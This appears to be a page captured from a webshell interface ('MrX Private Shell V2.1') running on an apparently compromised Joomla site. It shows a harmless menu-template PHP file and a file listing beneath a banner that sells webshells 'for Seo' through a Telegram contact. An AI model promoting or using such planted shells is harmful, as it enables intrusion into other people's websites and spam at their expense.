__ __ __ __ _____ _ _ _____ _ _ _ | \/ | \ \ / / | __ \ (_) | | / ____| | | | | | \ / |_ __\ V / | |__) | __ ___ ____ _| |_ ___ | (___ | |__ ___| | | | |\/| | '__|> < | ___/ '__| \ \ / / _` | __/ _ \ \___ \| '_ \ / _ \ | | | | | | |_ / . \ | | | | | |\ V / (_| | || __/ ____) | | | | __/ | | |_| |_|_(_)_/ \_\ |_| |_| |_| \_/ \__,_|\__\___| |_____/|_| |_|\___V 2.1 if you need WebShell for Seo everyday contact me on Telegram Telegram Address : @jackleetFor_More_Tools:
<?php
/********************************************************************
Product : Simple Responsive Menu
Date : 30 November 2023
Copyright : Les Arbres Design 2010-2023
Contact : https://www.lesarbresdesign.info
Licence : GNU General Public License
*********************************************************************/
defined('_JEXEC') or die;
echo "\n".'<div class="srm_position" style="'.$div_styles.'">';
$onchange = 'onchange="var e=document.getElementById(\'srm_select_list\'); window.location.href=e.options[e.selectedIndex].value"';
echo "\n".'<select id="srm_select_list" size="1" style="'.$select_styles.'" '.$onchange.'>';
if ($hamburger)
echo "\n".'<option value="#" selected="selected">☰</option>';
elseif ($fixedText != '')
echo "\n".'<option value="#" selected="selected">'.$fixedText.'</option>';
$depth = 0;
foreach ($list as $i => &$item)
{
if ($item->id == $active_id)
$selected = ' selected="selected"';
else
$selected = '';
if ($hamburger or ($fixedText != '') )
$selected = '';
switch ($item->type)
{
case 'separator':
if ($showSeparators) // 1.07
{
$link = ''; // 1.07 - show with blank link
break; // 1.07
}
else
continue 2; // 1.06 - don't show item at all
case 'heading':
continue 2; // 1.06 - don't show item at all
case 'url':
case 'component':
default:
$link = $item->flink;
break;
}
echo "\n".'<option value="'.$link.'"'.$selected.'>';
for ($i=0; $i < $depth; $i++)
echo '- ';
echo $item->title;
echo '</option>';
if ($item->deeper)
$depth ++;
if ($item->shallower)
$depth -= $item->level_diff;
}
echo '</select>';
echo '</div>';| Name | Type | Size | Permission | Actions |
|---|---|---|---|---|
| default.php | File | 2.26 KB | 0664 |
|
| default_component.php | File | 1.41 KB | 0664 |
|
| default_heading.php | File | 971 B | 0664 |
|
| default_separator.php | File | 970 B | 0664 |
|
| default_url.php | File | 1.57 KB | 0664 |
|
| index.html | File | 31 B | 0664 |
|
| select_list.php | File | 1.7 KB | 0664 |
|